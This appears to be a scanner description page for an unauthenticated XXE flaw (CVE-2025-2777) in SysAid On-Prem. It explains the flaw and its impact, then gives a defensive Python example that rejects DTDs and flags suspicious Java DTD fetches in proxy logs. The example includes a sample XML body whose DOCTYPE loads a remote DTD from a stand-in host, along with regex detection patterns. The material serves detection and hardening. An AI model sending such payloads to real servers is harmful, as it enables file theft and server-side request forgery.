CVE-2025-2777 Scanner
CVE-2025-2777 Scanner - XML External Entity (XXE) vulnerability in SysAid On-Prem
Short Info
Level: Single Scan
Can be used by: Asset Owner
Estimated Time: 10 seconds
Time Interval: 8 days 8 hours
Scan only one: Domain, Subdomain, IPv4
Toolbox: -
SysAid On-Prem is a self-hosted IT service management (ITSM) platform commonly used by enterprises and government organizations to manage and automate help desk operations, asset management, and IT support workflows. It is designed for internal deployment on enterprise servers and is accessible via web interfaces by IT staff. SysAid On-Prem supports custom automation, third-party integrations, and enterprise-level configurations. Organizations choose this product to keep full control over data and security policies. It is typically used by IT departments to centralize incident reporting, asset tracking, and internal service requests. Due to its administrative reach, vulnerabilities in this platform can pose a critical risk to infrastructure integrity.
The vulnerability targeted by this scanner is an unauthenticated XML External Entity (XXE) injection flaw in SysAid On-Prem versions <= 23.3.40. XXE vulnerabilities occur when XML parsers improperly process external entities within submitted XML documents. This particular flaw lies within the lshw processing functionality, where specially crafted XML input allows external resource inclusion. An attacker can exploit this to read arbitrary files on the server or trigger server-side request forgery (SSRF). Because the vulnerability can be exploited without authentication, it increases the attack surface significantly. Successful exploitation may allow attackers to gain sensitive information or control over privileged accounts.
This vulnerability is located in the lshw endpoint of SysAid On-Prem, which processes XML data received in POST requests. The scanner sends a crafted XML payload containing a malicious DOCTYPE declaration that references a remote DTD hosted on the interactsh service. If the server attempts to resolve that external DTD, the resulting callback confirms the vulnerability. Key indicators of successful exploitation include outbound HTTP requests carrying a Java-based User-Agent header and HTTP callbacks to the attacker-controlled server. The root cause is an XML parser that is not configured to restrict DTD processing and external entity loading. The vulnerability can be exploited without authentication or user interaction.
If this vulnerability is exploited, attackers can read local files on the server, leading to information disclosure. In some cases, it may even be possible to steal administrator credentials or session data, enabling full system compromise. Attackers could chain this flaw with others for privilege escalation. The exposure of sensitive internal data could lead to regulatory violations or data leaks. Insecure processing of XML can also facilitate more complex attacks such as SSRF or remote code execution, depending on the environment. Prompt mitigation is necessary to avoid exploitation in the wild.
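The two defender-side controls that follow from the description above are a pre-parse guard that rejects any DTD before the XML reaches the parser (the configuration fix the page names as the root cause) and an egress-log rule that catches the indicator the page describes, a Java User-Agent fetching a DTD from a host the server has no business talking to. The block below is an added example and is not SysAid's code or the scanner's own logic; the XML bodies, the proxy log format, the server and host addresses (203.0.113.10, 10.0.0.5, updates.example.internal) and the `.dtd` filename are all constructed for illustration, and the real lshw endpoint path is not used because the page does not give it.

```python
"""Defender-side XXE guard and egress detection (added example, constructed data)."""
import re
import xml.etree.ElementTree as ET
from typing import List, Set, Tuple
from urllib.parse import urlparse

# Tokens a DTD-free XML API should never accept. Rejecting every DOCTYPE is the
# standard hardening: with no DTD there are no external entities, no parameter
# entities and no external DTD fetch, so the callback the scanner looks for
# cannot occur.
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
ENTITY_RE = re.compile(r"<!ENTITY\b", re.IGNORECASE)
EXTERNAL_ID_RE = re.compile(r"\b(?:SYSTEM|PUBLIC)\s+\"[^\"]*\"", re.IGNORECASE)

# Constructed request bodies: a benign lshw-style inventory and one carrying the
# remote-DTD DOCTYPE shape described on this page.
BENIGN_BODY = (
    '<?xml version="1.0"?><list><node id="core">'
    "<description>Motherboard</description></node></list>"
)
DOCTYPE_BODY = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE list SYSTEM "http://203.0.113.10/x.dtd"><list/>'
)


def inspect_xml_body(body: str) -> List[str]:
    """Return the XXE indicators present in a raw request body, in a fixed order."""
    findings = []
    if DOCTYPE_RE.search(body):
        findings.append("doctype")
    if ENTITY_RE.search(body):
        findings.append("entity-declaration")
    if EXTERNAL_ID_RE.search(body):
        findings.append("external-identifier")
    return findings


def parse_inventory_xml(body: str) -> ET.Element:
    """Parse inventory XML only when it carries no DTD at all.

    ElementTree's expat parser does not fetch external entities on its own, but
    the guard runs before any parser touches the input, so the same check can sit
    in front of a Java DocumentBuilder, which does resolve them unless configured
    otherwise.
    """
    findings = inspect_xml_body(body)
    if findings:
        raise ValueError("rejected XML body: " + ", ".join(findings))
    return ET.fromstring(body)


# Constructed egress-proxy lines: "<timestamp> <src> <method> <url> <status> "<user-agent>""
PROXY_LINES = [
    '2025-05-09T10:00:01Z 10.0.0.5 GET https://updates.example.internal/manifest.xml 200 "Java/11.0.2"',
    '2025-05-09T10:00:02Z 10.0.0.5 GET http://203.0.113.10/x.dtd 200 "Java/1.8.0_202"',
    '2025-05-09T10:00:03Z 10.0.0.7 GET http://203.0.113.10/x.dtd 200 "Mozilla/5.0"',
]
PROXY_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\d{3}) "([^"]*)"$')
JAVA_UA_RE = re.compile(r"^Java/")


def flag_dtd_callbacks(
    lines: List[str], xml_servers: Set[str], allowed_hosts: Set[str]
) -> List[Tuple[str, str, str]]:
    """Return (timestamp, source, url) for Java-UA fetches by XML-processing
    servers to hosts outside the allowlist; that pattern is the page's indicator
    of a resolved external DTD."""
    hits = []
    for line in lines:
        m = PROXY_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than guess
        ts, src, _method, url, _status, ua = m.groups()
        if src not in xml_servers or not JAVA_UA_RE.match(ua):
            continue
        if urlparse(url).hostname in allowed_hosts:
            continue
        hits.append((ts, src, url))
    return hits


if __name__ == "__main__":
    print(inspect_xml_body(DOCTYPE_BODY))
    print(flag_dtd_callbacks(PROXY_LINES, {"10.0.0.5"}, {"updates.example.internal"}))
```

The allowlist matters in practice: Java services legitimately fetch with a `Java/` User-Agent, so the rule keys on the source being an XML-processing host and the destination being unknown, not on the User-Agent alone.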